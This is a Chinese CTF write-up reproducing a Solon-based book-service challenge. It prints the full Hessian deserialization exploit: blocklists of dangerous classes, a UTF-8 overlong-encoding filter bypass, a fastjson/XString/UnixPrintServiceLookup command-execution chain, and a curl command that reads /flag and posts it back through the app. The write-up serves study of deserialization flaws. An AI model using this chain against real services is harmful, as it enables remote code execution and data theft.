前言
当时ciscn&长城杯场上的一题零解题,当时反编译看了一下这题的源码,发现是微服务形式的,有个ApiGateway,然后看了半天也找不到反序列化的点,甚至连请求哪个路由都不清楚🥲然后用的又是solon这个框架不熟悉,直接开摆了
后来看到有师傅解出来了,遂来复现一下
复现
看了一下才发现网关这里限制了我们的路由前缀(没学过不太懂😭,怪不得直接getAllBooks什么都没有
直接问deepseek的解释如下:
这段代码实现了一个 API 网关,主要功能包括:
- 路由匹配:
- 所有以
/api/rest/ 开头的请求都会被该网关处理。
- 例如,
/api/rest/book 会被映射到 BookServiceImpl 类。
- 前置逻辑:
- 在请求处理之前,设置默认的响应渲染格式为 JSON。
- 服务注册:
- 将
BookServiceImpl 类注册为处理 /api/rest/book 路径的服务。
这里可以看到用的是solon的2.5.12的版本,当时直接搜是没有搜到该版本的漏洞的,一搜反序列化基本都是2.5.11的
然后这位老哥是从github的issue翻到相关的信息,嘶我突然想到我可以用英文搜一搜试试,被中文限制了,怪不得我每次都找不到exp😭
果然换英文就能搜到很多东西了,可以直接去对应的issue看一看:https://github.com/opensolon/solon/issues/226,这个issue是用Fury组件的RPC序列化和反序列化的漏洞
但是题目给的这个版本为啥压根就没这东西。。。
然后老哥是找的再往前的一个RCE的issue:https://github.com/opensolon/solon/issues/73
该issue的漏洞是一个Hessian反序列化,在org/noear/solon/serialization/hessian/HessianActionExecutor.java这个类里面的漏洞代码如下:
@Override
protected Object changeBody(Context ctx) throws Exception {
Hessian2Input hi = new Hessian2Input(new ByteArrayInputStream(ctx.bodyAsBytes()));
return hi.readObject();
}
|
所以如果Content-Type 为 application/hessian ,则发送到含参 RESTful API 的 Request 中的 Body 部分会被 Hessian 进行反序列化,但是题目这里是手动加了一个tested方法来过滤
顺便看了一下原作者的修复,是将对hessian的依赖改成sofa-hessian,该版本用的也是sofa-hessian,有趣的是后面又有issue把sofa-hessian给绕了:https://github.com/opensolon/solon/issues/145
waf绕过
看一下他的过滤方法,sofa-hessian本身就是利用了黑名单的方式,里面在hessian反序列化的过程进行了patch
在com.alibaba.com.caucho.hessian.io/ClassFactory里面,emmm但是说实话这里挺奇怪的,我本地下了sofa-hessian他是并没有这个ClassFactory的,反而是在正常的hessian里面的,sofa-hessian的黑名单是另一种方式的:
static {
_staticAllowList = new ArrayList<Allow>();
ClassLoader classLoader = ClassFactory.class.getClassLoader();
List<String> stringList = new ArrayList<>();
for (byte[] bytes : byteArray) {
stringList.add(new String(bytes));
}
String[] denyClasses = stringList.toArray(new String[0]);
for (String denyClass : denyClasses) {
if (denyClass.startsWith("#")) {
continue;
}
if (denyClass.endsWith(".")) {
_staticAllowList.add(new AllowPrefix(denyClass, false));
} else {
_staticAllowList.add(new Allow(toPattern(denyClass), false));
}
}
}
|
黑名单如下:
bsh.
ch.qos.logback.core.db.
clojure.
com.alibaba.citrus.springext.support.parser.
com.alibaba.citrus.springext.util.SpringExtUtil.
com.alibaba.druid.pool.
com.alibaba.hotcode.internal.org.apache.commons.collections.functors.
com.alipay.custrelation.service.model.redress.
com.alipay.oceanbase.obproxy.druid.pool.
com.caucho.config.types.
com.caucho.hessian.test.
com.caucho.naming.
com.ibm.jtc.jax.xml.bind.v2.runtime.unmarshaller.
com.ibm.xltxe.rnm1.xtq.bcel.util.
com.mchange.v2.c3p0.
com.mysql.jdbc.util.
com.rometools.rome.feed.
com.sun.corba.se.impl.
com.sun.corba.se.spi.orbutil.
com.sun.jndi.rmi.
com.sun.jndi.toolkit.
com.sun.org.apache.bcel.internal.
com.sun.org.apache.xalan.internal.
com.sun.rowset.
com.sun.xml.internal.bind.v2.
com.taobao.vipserver.commons.collections.functors.
groovy.lang.
java.awt.
java.beans.
java.lang.ProcessBuilder
java.lang.Runtime
java.rmi.server.
java.security.
java.util.ServiceLoader
java.util.StringTokenizer
javassist.bytecode.annotation.
javassist.tools.web.Viewer
javassist.util.proxy.
javax.imageio.
javax.imageio.spi.
javax.management.
javax.media.jai.remote.
javax.naming.
javax.script.
javax.sound.sampled.
javax.swing.
javax.xml.transform.
net.bytebuddy.dynamic.loading.
oracle.jdbc.connector.
oracle.jdbc.pool.
org.apache.aries.transaction.jms.
org.apache.bcel.util.
org.apache.carbondata.core.scan.expression.
org.apache.commons.beanutils.
org.apache.commons.codec.binary.
org.apache.commons.collections.functors.
org.apache.commons.collections4.functors.
org.apache.commons.configuration.
org.apache.commons.configuration2.
org.apache.commons.dbcp.datasources.
org.apache.commons.dbcp2.datasources.
org.apache.commons.fileupload.disk.
org.apache.ibatis.executor.loader.
org.apache.ibatis.javassist.bytecode.
org.apache.ibatis.javassist.tools.
org.apache.ibatis.javassist.util.
org.apache.ignite.cache.
org.apache.log.output.db.
org.apache.log4j.receivers.db.
org.apache.myfaces.view.facelets.el.
org.apache.openjpa.ee.
org.apache.openjpa.ee.
org.apache.shiro.
org.apache.tomcat.dbcp.
org.apache.velocity.runtime.
org.apache.velocity.
org.apache.wicket.util.
org.apache.xalan.xsltc.trax.
org.apache.xbean.naming.context.
org.apache.xpath.
org.apache.zookeeper.
org.aspectj.apache.bcel.util.
org.codehaus.groovy.runtime.
org.datanucleus.store.rdbms.datasource.dbcp.datasources.
org.eclipse.jetty.util.log.
org.geotools.filter.
org.h2.value.
org.hibernate.tuple.component.
org.hibernate.type.
org.jboss.ejb3.
org.jboss.proxy.ejb.
org.jboss.resteasy.plugins.server.resourcefactory.
org.jboss.weld.interceptor.builder.
org.mockito.internal.creation.cglib.
org.mortbay.log.
org.quartz.
org.springframework.aop.aspectj.
org.springframework.beans.BeanWrapperImpl$BeanPropertyHandler
org.springframework.beans.factory.
org.springframework.expression.spel.
org.springframework.jndi.
org.springframework.orm.
org.springframework.transaction.
org.yaml.snakeyaml.tokens.
pstore.shaded.org.apache.commons.collections.
sun.rmi.server.
sun.rmi.transport.
weblogic.ejb20.internal.
weblogic.jms.common.
|
然后题目这里还有一个自己的黑名单
testCases就用二维数组存放过滤的类,过滤的类如下:
bsh.
ch.qos.logback.core.db.
clojure.
com.alibaba.citrus.springext.support.parser.
com.alibaba.citrus.springext.util.SpringExtUtil.
com.alibaba.druid.pool.
com.alibaba.hotcode.internal.org.apache.commons.collections.functors.
com.alipay.custrelation.service.model.redress.
com.alipay.oceanbase.obproxy.druid.pool.
com.caucho.config.types.
com.caucho.hessian.test.
com.caucho.naming.
com.ibm.jtc.jax.xml.bind.v2.runtime.unmarshaller.
com.ibm.xltxe.rnm1.xtq.bcel.util.
com.mchange.v2.c3p0.
com.mysql.jdbc.util.
com.rometools.rome.feed.
com.sun.corba.se.impl.
com.sun.corba.se.spi.orbutil.
com.sun.jndi.rmi.
com.sun.jndi.toolkit.
com.sun.org.apache.bcel.internal.
com.sun.org.apache.xalan.internal.
com.sun.rowset.
com.sun.xml.internal.bind.v2.
com.taobao.vipserver.commons.collections.functors.
groovy.lang.
java.awt.
java.beans.
java.lang.ProcessBuilder
java.lang.Runtime
java.rmi.server.
java.security.
java.util.ServiceLoader
java.util.StringTokenizer
javassist.bytecode.annotation.
javassist.tools.web.Viewer
javassist.util.proxy.
javax.imageio.
javax.imageio.spi.
javax.management.
javax.media.jai.remote.
javax.naming.
javax.script.
javax.sound.sampled.
javax.swing.
javax.xml.transform.
net.bytebuddy.dynamic.loading.
oracle.jdbc.connector.
oracle.jdbc.pool.
org.apache.aries.transaction.jms.
org.apache.bcel.util.
org.apache.carbondata.core.scan.expression.
org.apache.commons.beanutils.
org.apache.commons.codec.binary.
org.apache.commons.collections.functors.
org.apache.commons.collections4.functors.
org.apache.commons.codec.
org.apache.commons.configuration.
org.apache.commons.configuration2.
org.apache.commons.dbcp.datasources.
org.apache.commons.dbcp2.datasources.
org.apache.commons.fileupload.disk.
org.apache.ibatis.executor.loader.
org.apache.ibatis.javassist.bytecode.
org.apache.ibatis.javassist.tools.
org.apache.ibatis.javassist.util.
org.apache.ignite.cache.
org.apache.log.output.db.
org.apache.log4j.receivers.db.
org.apache.myfaces.view.facelets.el.
org.apache.openjpa.ee.
org.apache.openjpa.ee.
org.apache.shiro.
org.apache.tomcat.dbcp.
org.apache.velocity.runtime.
org.apache.velocity.
org.apache.wicket.util.
org.apache.xalan.xsltc.trax.
org.apache.xbean.naming.context.
org.apache.xpath.
org.apache.zookeeper.
org.aspectj.
org.codehaus.groovy.runtime.
org.datanucleus.store.rdbms.datasource.dbcp.datasources.
org.dom4j.
org.eclipse.jetty.util.log.
org.geotools.filter.
org.h2.value.
org.hibernate.tuple.component.
org.hibernate.type.
org.jboss.ejb3.
org.jboss.proxy.ejb.
org.jboss.resteasy.plugins.server.resourcefactory.
org.jboss.weld.interceptor.builder.
org.junit.
org.mockito.internal.creation.cglib.
org.mortbay.log.
org.mockito.
org.thymeleaf.
org.quartz.
org.springframework.aop.aspectj.
org.springframework.beans.BeanWrapperImpl$BeanPropertyHandler
org.springframework.beans.factory.
org.springframework.expression.spel.
org.springframework.jndi.
org.springframework.orm.
org.springframework.transaction.
org.yaml.snakeyaml.tokens.
ognl.
pstore.shaded.org.apache.commons.collections.
sun.print.
sun.rmi.server.
sun.rmi.transport.
weblogic.ejb20.internal.
weblogic.jms.common.
|
这里因为直接检测序列化的字符串,那就可以直接利用UTF-8 Overlong Encoding方法绕过,虽然是Hessian但本质也是一样的,X1r0z✌的文章有说:https://exp10it.io/2024/02/hessian-utf-8-overlong-encoding/
里面也有写好的代码,这里copy一下
package com.example;
import com.caucho.hessian.io.Hessian2Output;
import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Field;
public class Hessian2OutputWithOverlongEncoding extends Hessian2Output {
public Hessian2OutputWithOverlongEncoding(OutputStream os) {
super(os);
}
@Override
public void printString(String v, int strOffset, int length) throws IOException {
int offset = (int) getSuperFieldValue("_offset");
byte[] buffer = (byte[]) getSuperFieldValue("_buffer");
for (int i = 0; i < length; i++) {
if (SIZE <= offset + 16) {
setSuperFieldValue("_offset", offset);
flushBuffer();
offset = (int) getSuperFieldValue("_offset");
}
char ch = v.charAt(i + strOffset);
buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f));
buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f));
}
setSuperFieldValue("_offset", offset);
}
@Override
public void printString(char[] v, int strOffset, int length) throws IOException {
int offset = (int) getSuperFieldValue("_offset");
byte[] buffer = (byte[]) getSuperFieldValue("_buffer");
for (int i = 0; i < length; i++) {
if (SIZE <= offset + 16) {
setSuperFieldValue("_offset", offset);
flushBuffer();
offset = (int) getSuperFieldValue("_offset");
}
char ch = v[i + strOffset];
buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f));
buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f));
}
setSuperFieldValue("_offset", offset);
}
public int[] convert(int i) {
int b1 = ((i >> 6) & 0b11111) | 0b11000000;
int b2 = (i & 0b111111) | 0b10000000;
return new int[]{ b1, b2 };
}
public Object getSuperFieldValue(String name) {
try {
Field f = this.getClass().getSuperclass().getDeclaredField(name);
f.setAccessible(true);
return f.get(this);
} catch (Exception e) {
return null;
}
}
public void setSuperFieldValue(String name, Object val) {
try {
Field f = this.getClass().getSuperclass().getDeclaredField(name);
f.setAccessible(true);
f.set(this, val);
} catch (Exception e) {
e.printStackTrace();
}
}
}
|
然后这里还有一个fastjson1.2.83的版本,可以直接用fastjson原生反序列化的那条链子,不过因为有些类被ban了我们需要绕过,先看一下本来的链子
ObjectInputStream.readObject ->
HashMap.readObject ->
BadAttributeValueExpException.readObject ->
JSONArray.toString ->
JSON.toString (JSONArray extends JSON)->
JSON.toJSONString ->
TemplatesImpl.getOutputProperties ->
TemplatesImpl.newTransformer
|
但是这里BadAttributeValueExpException和TemplatesImpl都被过滤了,需要找其他类替换一下,BadAttributeValueExpException我们可以替换成XString,因为XString通过equals来触发toString,而HashMap反序列化的时候刚好会触发
然后TemplatesImpl部分的触发可以换成UnixPrintServiceLookup,不过这个类只在Unix下面才有用,而这部分的利用就在我前面说到的绕过sofa-hessian的issue里面
这得用Linux下的idea调了。。。
UnixPrintServiceLookup类
这里来调一下他的利用方式,因为之前没见过,可以参考这篇文章:https://whoopsunix.com/docs/components/Dubbo/CVE-2022-39198/
UnixPrintServiceLookup 是 Java 打印服务 API 中的一个平台特定实现类,主要用于在 Unix/Linux 系统上查找和管理打印服务。它是 PrintServiceLookup 的一个子类,专门为 Unix 类操作系统(如 Linux、BSD 等)提供打印服务的查找和访问功能。
该类利用的getter方法是sun.print.UnixPrintServiceLookup#getDefaultPrintService(),最终是触发到该类里面的一个execCmd方法
该方法的调用有很多,我们需要找一个参数是我们能够控制的,这里找到了getDefaultPrinterNameBSD()方法
这里传入的参数都是属性值,那我们就可以通过反射来控制了
不过要走到这我们需要满足前面两个条件,isMac()和isSysV()判断的是你的系统是否为macOS和SunOS,可以用反射绕过,我用kali的就不用担心;
还有就是isCupsRunning()方法,isCupsRunning是检测本机的CUPS服务,可以通过访问http://127.0.0.1:631/看看是否开启,我用的kali是没有开启,看别人说Ubuntu默认开启,要注意一下,如果开启了用下面的命令关闭即可
sudo systemctl mask cups
reboot
|
然后调用的写法类似这样
import sun.print.UnixPrintServiceLookup;
import java.lang.reflect.Field;
public class demo {
public static void setFieldValue(Object obj,String name,Object value)throws Exception{
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
field.set(obj, value);
}
public static void main(String[] args) throws Exception{
String cmd = "touch /tmp/evilfile";
UnixPrintServiceLookup unixPrintServiceLookup = new UnixPrintServiceLookup();
setFieldValue(unixPrintServiceLookup, "cmdIndex", 0);
setFieldValue(unixPrintServiceLookup, "osname", "xx");
setFieldValue(unixPrintServiceLookup, "lpcFirstCom", new String[]{cmd, cmd, cmd});
System.out.println(unixPrintServiceLookup.getDefaultPrintService());
}
}
|
成功执行
不过这里我看大部分都用Unsafe来获取UnixPrintServiceLookup的实例,可该类的构造方法是public的,我上面正常写也是能执行的,怪🤔
exp构造
那现在就可以来改造我们的exp了(直接抄文章的exp
package org.example;
import com.alibaba.fastjson.JSONObject;
import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.SerializerFactory;
import com.sun.org.apache.xpath.internal.objects.XString;
import sun.misc.Unsafe;
import sun.print.UnixPrintServiceLookup;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;
public class BookExp {
public static void setValue(Object obj,String name,Object value)throws Exception{
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
field.set(obj, value);
}
public static void main(String[] args) {
try {
String cmd = "touch /tmp/evilTest";
Field theUnsafe = Unsafe.class.getDeclaredField("theUnsafe");
theUnsafe.setAccessible(true);
Unsafe unsafe = (Unsafe) theUnsafe.get(null);
Object unixPrintServiceLookup = unsafe.allocateInstance(UnixPrintServiceLookup.class);
setValue(unixPrintServiceLookup, "cmdIndex", 0);
setValue(unixPrintServiceLookup, "osname", "xx");
setValue(unixPrintServiceLookup, "lpcFirstCom", new String[]{cmd, cmd, cmd});
JSONObject jsonObject = new JSONObject();
jsonObject.put("xx", unixPrintServiceLookup);
XString xString = new XString("xx");
HashMap map1 = new HashMap();
HashMap map2 = new HashMap();
map1.put("yy",jsonObject);
map1.put("zZ",xString);
map2.put("yy",xString);
map2.put("zZ",jsonObject);
HashMap s = new HashMap();
setValue(s, "size", 2);
Class nodeC;
try {
nodeC = Class.forName("java.util.HashMap$Node");
}
catch ( ClassNotFoundException e ) {
nodeC = Class.forName("java.util.HashMap$Entry");
}
Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
nodeCons.setAccessible(true);
Object tbl = Array.newInstance(nodeC, 2);
Array.set(tbl, 0, nodeCons.newInstance(0, map1, map1, null));
Array.set(tbl, 1, nodeCons.newInstance(0, map2, map2, null));
setValue(s, "table", tbl);
FileOutputStream fileOutputStream=new FileOutputStream("ser");
Hessian2OutPutWithOverlongEncoding hessianOutput = new Hessian2OutPutWithOverlongEncoding(fileOutputStream);
hessianOutput.setSerializerFactory(new SerializerFactory());
hessianOutput.getSerializerFactory().setAllowNonSerializable(true);
hessianOutput.writeObject(s);
hessianOutput.flushBuffer();
Hessian2Input hessian2Input=new Hessian2Input(new FileInputStream("ser"));
hessian2Input.readObject();
}catch (Exception e) {
e.printStackTrace();
}
}
}
|
ok成功执行
带出数据
原题的靶机是不出网的,不能直接弹shell,所以需要利用一些方式来带出数据,题目给了我们相关的一些服务,
题目中的/addBook 可以动态添加图书内容,且添加的图书内容可以通过 /getAllBooks 回显,那就可以利用该方式拿到来回显flag。
我们要执行的命令就是利用curl去请求服务来添加flag
curl -X POST http://localhost:8080/api/rest/book/addBook -H "Content-Type: application/json" -d '{"bookId": 1, "title": "'$(cat /flag)'", "author": "yuanshan", "publishDate": "2024-12-22", "price": 0.00}'
|
然后需要写个脚本来发包,因为要直接发hessian数据,burp不好操作,也是直接用文章里的脚本就可以了
import re
import requests
with open("ser", "rb") as f:
body = f.read()
print(len(body))
url = "http://localhost:8080/api/rest/book/getBookById"
headers = { "Content-Type": "application/hessian" }
response = requests.get(url, headers=headers, data=body)
print(response.text)
url = "http://localhost:8080/api/rest/book/getAllBooks"
response = requests.get(url)
print(response.text)
|
emmm这里一开始我用的nss的环境,但是打过去没反应,本地测试是可以的,那就本地打打算了,放个flag在根目录
这里得注意一下得请求一个接受参数的路由才会走到hessian反序列化的地方,毕竟方法名叫changeBody了,接收Body才能change🤔
参考
https://xz.aliyun.com/t/16878?time__1311=Gui%3DGK0Iq%2BED%2FD0l7GkDujUrF3PNfAeD
https://github.com/opensolon/solon/issues/145
https://whoopsunix.com/docs/components/Dubbo/CVE-2022-39198/
https://www.cnblogs.com/kingbridge/articles/17020853.html
